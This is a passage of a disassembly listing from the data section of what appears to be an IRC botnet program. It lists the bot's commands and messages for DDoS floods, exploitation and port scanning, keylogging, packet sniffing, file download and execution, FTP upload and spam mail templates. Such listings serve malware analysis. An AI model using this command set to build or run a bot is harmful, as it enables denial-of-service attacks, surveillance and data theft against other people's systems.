aCouldnTExecute db ' Couldn',27h,'t execute file.',0
align 4
unk_42C788 db 2 ; DATA XREF: sub_40D2E0+3DA0�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 66h, 69h, 6Ch
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_16 db ' Failed to start search thread, error: <%d>.',0
align 4
unk_42C7D4 db 2 ; DATA XREF: sub_40D2E0+3D26�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 66h, 69h, 6Ch
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSearchingFor_0 db ' Searching for file: %s in: %s.',0
align 4
dword_42C814 dd 7A026E02h, 201F6D1Fh, 6C696628h, 1F702E65h, 29671F6Ch
; DATA XREF: sub_40D2E0:loc_410F67�o
; sub_40D2E0:loc_411DD0�o
dd 0BBBB0220h, 2002h
unk_42C830 db 2 ; DATA XREF: sub_40D2E0+3C6F�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Ch
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aRenameSToS_ db ' Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0
align 4
unk_42C864 db 2 ; DATA XREF: sub_40D2E0:loc_410F2D�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aInvalidFloodTi db ' Invalid flood time must be greater than 0.',0
align 4
unk_42C8AC db 2 ; DATA XREF: sub_40D2E0+3C43�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStartF db ' Failed to start flood thread, error: <%d>.',0
align 4
unk_42C8F4 db 2 ; DATA XREF: sub_40D2E0+3BCF�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFloodingSForSS db ' Flooding: (%s) for %s seconds.',0
align 10h
unk_42C930 db 2 ; DATA XREF: sub_40D2E0+3B4C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 6Ch, 6Fh
db 6Eh ; n
db 65h, 73h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToSta_17 db ' Failed to start clone thread, error: <%d>.',0
unk_42C978 db 2 ; DATA XREF: sub_40D2E0+3ADD�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 6Ch, 6Fh
db 6Eh ; n
db 65h, 73h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aCreatedOnSDInC db ' Created on %s:%d, in channel %s.',0
align 4
unk_42C9B8 db 2 ; DATA XREF: sub_40D2E0+3A55�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 2 dup(64h), 6Fh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_18 db ' Failed to start flood thread, error: <%d>.',0
align 10h
unk_42CA00 db 2 ; DATA XREF: sub_40D2E0+39E6�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 2 dup(64h), 6Fh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFloodingSSForS db ' Flooding: (%s:%s) for %s seconds.',0
align 10h
dword_42CA40 dd 7A026E02h, 201F6D1Fh, 6E797328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+3948�o
dd 2BBBB02h
aFailedToSta_19 db ' Failed to start flood thread, error: <%d>.',0
align 4
dword_42CA88 dd 7A026E02h, 201F6D1Fh, 6E797328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+38D7�o
dd 2BBBB02h
aFloodingSSFo_0 db ' Flooding: (%s:%s) for %s seconds.',0
unk_42CAC4 db 2 ; DATA XREF: sub_40D2E0+385E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStartT db ' Failed to start transfer thread, error: <%d>.',0
align 4
unk_42CB14 db 2 ; DATA XREF: sub_40D2E0+37EF�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDownloadingUrl db ' Downloading URL: %s to: %s.',0
align 10h
unk_42CB50 db 2 ; DATA XREF: sub_40D2E0+371D�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStartR db ' Failed to start redirection thread, error: <%d>.',0
align 4
unk_42CBA4 db 2 ; DATA XREF: sub_40D2E0+36AE�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aTcpRedirectCre db ' TCP redirect created from: %s:%d to: %s:%d.',0
unk_42CBF0 db 2 ; DATA XREF: sub_40D2E0+3620�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_20 db ' Failed to start scan thread, error: <%d>.',0
align 4
unk_42CC3C db 2 ; DATA XREF: sub_40D2E0+35B1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aPortScanStarte db ' Port scan started: %s:%d with delay: %d(ms).',0
aSSS_0 db '[%s] <%s> %s',0 ; DATA XREF: sub_40D2E0+352D�o
align 4
aSSS_1 db '[%s] * %s %s',0 ; DATA XREF: sub_40D2E0+3430�o
align 4
dword_42CCA8 dd 54434101h, 204E4F49h, 17325h ; DATA XREF: sub_40D2E0+33A2�o
; sub_40D2E0+43EF�o
unk_42CCB4 db 2 ; DATA XREF: sub_40D2E0+3340�o
; sub_40D2E0+5179�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_21 db ' Failed to start scan thread, error: <%d>.',0
align 4
unk_42CCFC db 2 ; DATA XREF: sub_40D2E0+32D1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSExploitationS db ' %s Exploitation started on %s:%d waiting %d seconds for %d minu'
db 'tes using %d threads.',0
aSequential db 'Sequential',0 ; DATA XREF: sub_40D2E0+32A6�o
; sub_40D2E0+50DD�o
align 4
aRandom_0 db 'Random',0 ; DATA XREF: sub_40D2E0+329F�o
; sub_40D2E0+50D6�o
align 10h
unk_42CD80 db 2 ; DATA XREF: sub_40D2E0+3161�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_22 db ' Failed to start scan, no IP specified.',0
align 4
unk_42CDC4 db 2 ; DATA XREF: sub_40D2E0+301A�o
; sub_40D2E0+4F21�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aAlreadyDScanni db ' Already %d scanning threads. Too many specified.',0
dword_42CE10 dd 7A026E02h, 201F6D1Fh, 70647528h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+2FE9�o
dd 2BBBB02h
aFailedToSta_23 db ' Failed to start flood thread, error: <%d>.',0
align 4
dword_42CE58 dd 7A026E02h, 201F6D1Fh, 70647528h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+2F7A�o
dd 2BBBB02h
aSendingDPacket db ' Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).',0
align 10h
aIcmp_dllNotAva db 'ICMP.dll not available',0 ; DATA XREF: sub_40D2E0+2EA2�o
align 4
unk_42CEC8 db 2 ; DATA XREF: sub_40D2E0+2E8D�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 69h, 6Eh
db 67h ; g
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_24 db ' Failed to start flood thread, error: <%d>.',0
align 10h
unk_42CF10 db 2 ; DATA XREF: sub_40D2E0+2E22�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 69h, 6Eh
db 67h ; g
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSendingDPingsT db ' Sending %d pings to %s. packet size: %d, timeout: %d(ms).',0
align 4
dword_42CF68 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0:loc_410062�o
dd 2BBBB02h
aInvalidFlood_0 db ' Invalid flood time must be greater than 0.',0
align 10h
dword_42CFB0 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+2D78�o
dd 2BBBB02h
aFailedToSta_25 db ' Failed to start flood thread, error: <%d>.',0
align 4
dword_42CFF8 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+2CFE�o
dd 2BBBB02h
aSSFloodingSSFo db ' %s %s flooding: (%s:%s) for %s seconds.',0
align 4
aNormal db 'Normal',0 ; DATA XREF: sub_40D2E0+2CEE�o
align 4
aSpoofed db 'Spoofed',0 ; DATA XREF: sub_40D2E0+2CE7�o
dword_42D04C dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+2C4C�o
dd 2BBBB02h
aInvalidFloodTy db ' Invalid flood type specified.',0
dword_42D084 dd 7A026E02h, 201F6D1Fh, 70746628h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0:loc_40FE41�o
dd 2BBBB02h
aUploadingFileS db ' Uploading file: %s to: %s failed.',0
dword_42D0C0 dd 7A026E02h, 201F6D1Fh, 70746628h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+2B5A�o
dd 2BBBB02h
aUploadingFil_0 db ' Uploading file: %s to: %s',0
aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_40D2E0+2B43�o
aSS_4 db '-s:%s',0 ; DATA XREF: sub_40D2E0+2B2C�o
align 4
aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_40D2E0+2B09�o
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'put %s',0Dh,0Ah
db 'bye',0Dh,0Ah,0
align 4
aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_40D2E0+2AD4�o
align 4
dword_42D138 dd 7A026E02h, 201F6D1Fh, 70746628h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+2A8A�o
dd 2BBBB02h
aFileNotFoundS_ db ' File not found: %s.',0
align 4
aFtp_upload db 'ftp.upload',0 ; DATA XREF: sub_40D2E0+2A67�o
align 4
aUtil_hcon db 'util.hcon',0 ; DATA XREF: sub_40D2E0+2A44�o
align 10h
aUtil_httpcon db 'util.httpcon',0 ; DATA XREF: sub_40D2E0+2A2D�o
align 10h
unk_42D190 db 3 ; DATA XREF: sub_40D2E0+2A11�o
db 31h, 35h, 2Ch
db 31h ; 1
db 34h, 6Eh, 7Ah
db 6Dh ; m
db 20h, 3, 32h
db 2Eh ; .
db 2Eh, 20h, 3
db 31h ; 1
db 35h, 28h, 65h
db 6Dh ; m
db 61h, 69h, 6Ch
db 3
db 32h, 2Eh, 3
db 31h ; 1
db 35h, 6Dh, 6Fh
db 64h ; d
db 29h, 20h, 3
db 32h ; 2
db 0BBh, 3, 31h
a5MessageSentTo db '5 Message sent to %s.',0
align 10h
aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_40D2E0+299D�o
db 'mail from: <%s>',0Ah
db 'rcpt to: <%s>',0Ah
db 'data',0Ah
db 'subject: %s',0Ah
db 'from: %s',0Ah
db '%s',0Ah
db '.',0Ah,0
a__0: ; DATA XREF: sub_40D2E0+2901�o
unicode 0, <_>,0
aUtil_email db 'util.email',0 ; DATA XREF: sub_40D2E0+28B2�o
align 4
aDdos_tcpf db 'ddos.tcpf',0 ; DATA XREF: sub_40D2E0+289B�o
align 4
aDdos_tcpflood db 'ddos.tcpflood',0 ; DATA XREF: sub_40D2E0+2884�o
align 4
aP: ; DATA XREF: sub_40D2E0+286D�o
unicode 0, <p>,0
aDdos_pingf db 'ddos.pingf',0 ; DATA XREF: sub_40D2E0+2856�o
align 4
aDdos_pingflood db 'ddos.pingflood',0 ; DATA XREF: sub_40D2E0+283F�o
align 4
aU_0: ; DATA XREF: sub_40D2E0+2828�o
unicode 0, <u>,0
aDdos_udpf db 'ddos.udpf',0 ; DATA XREF: sub_40D2E0+2811�o
align 4
aDdos_udpflood db 'ddos.udpflood',0 ; DATA XREF: sub_40D2E0+27FA�o
align 4
aAsc db 'asc',0 ; DATA XREF: sub_40D2E0+27E3�o
aAdvscan db 'advscan',0 ; DATA XREF: sub_40D2E0+27CC�o
aClone_ac db 'clone.ac',0 ; DATA XREF: sub_40D2E0+27A3�o
align 10h
aClone_action db 'clone.action',0 ; DATA XREF: sub_40D2E0+278C�o
align 10h
aClone_pm db 'clone.pm',0 ; DATA XREF: sub_40D2E0+2775�o
align 4
aClone_privmsg db 'clone.privmsg',0 ; DATA XREF: sub_40D2E0+275E�o
align 4
aRoot_ps db 'root.ps',0 ; DATA XREF: sub_40D2E0+2747�o
aRoot_portscan db 'root.portscan',0 ; DATA XREF: sub_40D2E0+2730�o
align 4
aDaemon_rd db 'daemon.rd',0 ; DATA XREF: sub_40D2E0+2719�o
align 10h
aDaemon_redirec db 'daemon.redirect',0 ; DATA XREF: sub_40D2E0+2702�o
aDownload_wg db 'download.wg',0 ; DATA XREF: sub_40D2E0+26EB�o
aDownload_wget db 'download.wget',0 ; DATA XREF: sub_40D2E0+26D4�o
align 4
aDdos_synf db 'ddos.synf',0 ; DATA XREF: sub_40D2E0+26BD�o
align 4
aDdos_synflood db 'ddos.synflood',0 ; DATA XREF: sub_40D2E0+26A6�o
align 4
aClone_start db 'clone.start',0 ; DATA XREF: sub_40D2E0+264A�o
aClone_make db 'clone.make',0 ; DATA XREF: sub_40D2E0+2633�o
align 10h
aDdos_ic db 'ddos.ic',0 ; DATA XREF: sub_40D2E0+260A�o
aDdos_icmp db 'ddos.icmp',0 ; DATA XREF: sub_40D2E0+25F3�o
align 4
aCom_mv db 'com.mv',0 ; DATA XREF: sub_40D2E0+25DC�o
align 4
aCom_rename db 'com.rename',0 ; DATA XREF: sub_40D2E0+25C5�o
align 4
aFf db 'ff',0 ; DATA XREF: sub_40D2E0+25AE�o
align 4
aFindfile db 'findfile',0 ; DATA XREF: sub_40D2E0+2597�o
align 4
aCom_e db 'com.e',0 ; DATA XREF: sub_40D2E0+2580�o
align 10h
aCom_execute db 'com.execute',0 ; DATA XREF: sub_40D2E0+2569�o
aDownload_up db 'download.up',0 ; DATA XREF: sub_40D2E0+2552�o
aDownload_updat db 'download.update',0 ; DATA XREF: sub_40D2E0+253B�o
aIrc_de db 'irc.de',0 ; DATA XREF: sub_40D2E0+2524�o
align 10h
aIrc_delay db 'irc.delay',0 ; DATA XREF: sub_40D2E0+250D�o
align 4
aIrc_rp db 'irc.rp',0 ; DATA XREF: sub_40D2E0+24F6�o
align 4
aIrc_repeat db 'irc.repeat',0 ; DATA XREF: sub_40D2E0+24DF�o
align 10h
aClone_p db 'clone.p',0 ; DATA XREF: sub_40D2E0+24C8�o
aClone_part db 'clone.part',0 ; DATA XREF: sub_40D2E0+24B1�o
align 4
aClone_j db 'clone.j',0 ; DATA XREF: sub_40D2E0+249A�o
aClone_join db 'clone.join',0 ; DATA XREF: sub_40D2E0+2483�o
align 4
aClone_ni db 'clone.ni',0 ; DATA XREF: sub_40D2E0+246C�o
align 4
aClone_nick db 'clone.nick',0 ; DATA XREF: sub_40D2E0+2455�o
align 10h
aClone_m db 'clone.m',0 ; DATA XREF: sub_40D2E0+243E�o
aClone_mode db 'clone.mode',0 ; DATA XREF: sub_40D2E0+2427�o
align 4
aClone_ra db 'clone.ra',0 ; DATA XREF: sub_40D2E0+2410�o
align 10h
aClone_raw db 'clone.raw',0 ; DATA XREF: sub_40D2E0+23F9�o
align 4
aIrc_m db 'irc.m',0 ; DATA XREF: sub_40D2E0+23E2�o
align 4
aIrc_mode db 'irc.mode',0 ; DATA XREF: sub_40D2E0+23CB�o
align 10h
aIrc_cy db 'irc.cy',0 ; DATA XREF: sub_40D2E0+23B4�o
align 4
aIrc_cycle db 'irc.cycle',0 ; DATA XREF: sub_40D2E0+239D�o
align 4
aIrc_ac db 'irc.ac',0 ; DATA XREF: sub_40D2E0+2386�o
align 4
aIrc_action db 'irc.action',0 ; DATA XREF: sub_40D2E0+236F�o
align 4
aIrc_pm db 'irc.pm',0 ; DATA XREF: sub_40D2E0+2358�o
align 10h
aIrc_privmsg db 'irc.privmsg',0 ; DATA XREF: sub_40D2E0+2341�o
aIrc_aa db 'irc.aa',0 ; DATA XREF: sub_40D2E0+232A�o
align 4
aIrc_addalias db 'irc.addalias',0 ; DATA XREF: sub_40D2E0+2313�o
align 4
aIrc_gh db 'irc.gh',0 ; DATA XREF: sub_40D2E0+22EA�o
align 4
aIrc_gethost db 'irc.gethost',0 ; DATA XREF: sub_40D2E0+22D3�o
aCom_cap db 'com.cap',0 ; DATA XREF: sub_40D2E0+22BC�o
aCom_capture db 'com.capture',0 ; DATA XREF: sub_40D2E0+22A5�o
dword_42D4DC dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0:loc_40F537�o
dd 2BBBB02h
aCommandUnknown db ' Command unknown.',0
align 4
dword_42D508 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0:loc_40F530�o
dd 2BBBB02h
aNoMessageSpeci db ' No message specified.',0
dword_42D538 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0:loc_40F4E5�o
dd 2BBBB02h
aUserListFailed db ' User list failed.',0
dword_42D564 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+21FE�o
dd 2BBBB02h
aUserListComple db ' User list completed.',0
align 4
aUser db 'user',0 ; DATA XREF: sub_40D2E0+218A�o
align 4
dword_42D59C dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0:loc_40F45F�o
dd 2BBBB02h
aShareListFaile db ' Share list failed.',0
align 4
dword_42D5CC dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+2175�o
dd 2BBBB02h
aShareListCompl db ' Share list completed.',0
aShare db 'share',0 ; DATA XREF: sub_40D2E0+211F�o
align 4
aDelete db 'delete',0 ; DATA XREF: sub_40D2E0+20FD�o
align 4
aContinue db 'continue',0 ; DATA XREF: sub_40D2E0+20E5�o
align 4
aPause db 'pause',0 ; DATA XREF: sub_40D2E0+20CD�o
align 10h
aStop db 'stop',0 ; DATA XREF: sub_40D2E0+20B5�o
align 4
dword_42D628 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0:loc_40F38A�o
dd 2BBBB02h
aServiceListFai db ' Service list failed.',0
align 4
dword_42D658 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+20A0�o
dd 2BBBB02h
aServiceListCom db ' Service list completed.',0
align 4
aStart db 'start',0 ; DATA XREF: sub_40D2E0+2069�o
align 4
dword_42D694 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+2036�o
dd 2BBBB02h
aFailedToLoadAd db ' Failed to load advapi32.dll or netapi32.dll.',0
align 4
aCom_net db 'com.net',0 ; DATA XREF: sub_40D2E0+2012�o
unk_42D6E4 db 2 ; DATA XREF: sub_40D2E0+1FD1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 6Bh, 65h, 79h
db 6Ch ; l
db 6Fh, 67h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToSta_26 db ' Failed to start logging thread, error: <%d>.',0
align 10h
unk_42D730 db 2 ; DATA XREF: sub_40D2E0+1F66�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 6Bh, 65h, 79h
db 6Ch ; l
db 6Fh, 67h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aKeyLoggerActiv db ' Key logger active.',0
unk_42D760 db 2 ; DATA XREF: sub_40D2E0+1EE5�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 6Bh, 65h, 79h
db 6Ch ; l
db 6Fh, 67h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aAlreadyRunni_1 db ' Already running.',0
align 10h
unk_42D790 db 2 ; DATA XREF: sub_40D2E0:loc_40F1A1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 6Bh, 65h, 79h
db 6Ch ; l
db 6Fh, 67h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aNoKeyLoggerThr db ' No key logger thread found.',0
align 4
unk_42D7CC db 2 ; DATA XREF: sub_40D2E0+1EB7�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 6Bh, 65h, 79h
db 6Ch ; l
db 6Fh, 67h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aKeyLoggerStopp db ' Key logger stopped. (%d thread(s) stopped.)',0
align 4
aFile db 'file',0 ; DATA XREF: sub_40D2E0+1E83�o
; sub_40D2E0+1EF9�o
align 10h
aCom_keylog db 'com.keylog',0 ; DATA XREF: sub_40D2E0+1E5D�o
align 4
unk_42D82C db 2 ; DATA XREF: sub_40D2E0:loc_40F133�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aNoCarnivoreThr db 'No Carnivore thread found.',0
align 4
unk_42D864 db 2 ; DATA XREF: sub_40D2E0+1E49�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aCarnivoreStopp db 'Carnivore stopped. (%d thread(s) stopped.)',0
align 4
aOff db 'off',0 ; DATA XREF: sub_40D2E0+1E26�o
; sub_40D2E0+1E94�o
unk_42D8B0 db 2 ; DATA XREF: sub_40D2E0+1E1B�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToSta_27 db 'Failed to start sniffer thread, error: <%d>.',0
align 4
unk_42D8FC db 2 ; DATA XREF: sub_40D2E0+1DAC�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aCarnivorePacke db 'Carnivore packet sniffer active.',0
align 4
unk_42D93C db 2 ; DATA XREF: sub_40D2E0+1D45�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aAlreadyRunni_2 db 'Already running.',0
align 4
aOn db 'on',0 ; DATA XREF: sub_40D2E0+1D25�o
; sub_40D2E0+1E72�o
align 10h
aSniff db 'sniff',0 ; DATA XREF: sub_40D2E0+1D10�o
align 4
aCom_rf db 'com.rf',0 ; DATA XREF: sub_40D2E0+1CF9�o
align 10h
aCom_readfile db 'com.readfile',0 ; DATA XREF: sub_40D2E0+1CE2�o
align 10h
aCom_cm db 'com.cm',0 ; DATA XREF: sub_40D2E0+1CCB�o
align 4
aCom_cmd db 'com.cmd',0 ; DATA XREF: sub_40D2E0+1CB4�o
aMirc_cmd db 'mirc.cmd',0 ; DATA XREF: sub_40D2E0+1C86�o
; sub_40D2E0+1C9D�o
align 4
aIrc_v db 'irc.v',0 ; DATA XREF: sub_40D2E0+1C6F�o
align 4
aIrc_visit db 'irc.visit',0 ; DATA XREF: sub_40D2E0+1C58�o
align 10h
aCom_fl db 'com.fl',0 ; DATA XREF: sub_40D2E0+1C41�o
align 4
aCom_filelist db 'com.filelist',0 ; DATA XREF: sub_40D2E0+1C2A�o
align 4
aDcc_gt db 'dcc.gt',0 ; DATA XREF: sub_40D2E0+1C13�o
align 10h
aDcc_get db 'dcc.get',0 ; DATA XREF: sub_40D2E0+1BFC�o
aCom_del db 'com.del',0 ; DATA XREF: sub_40D2E0+1BE5�o
aCom_delete db 'com.delete',0 ; DATA XREF: sub_40D2E0+1BCE�o
align 4
aCom_pkid db 'com.pkid',0 ; DATA XREF: sub_40D2E0+1BB7�o
align 4
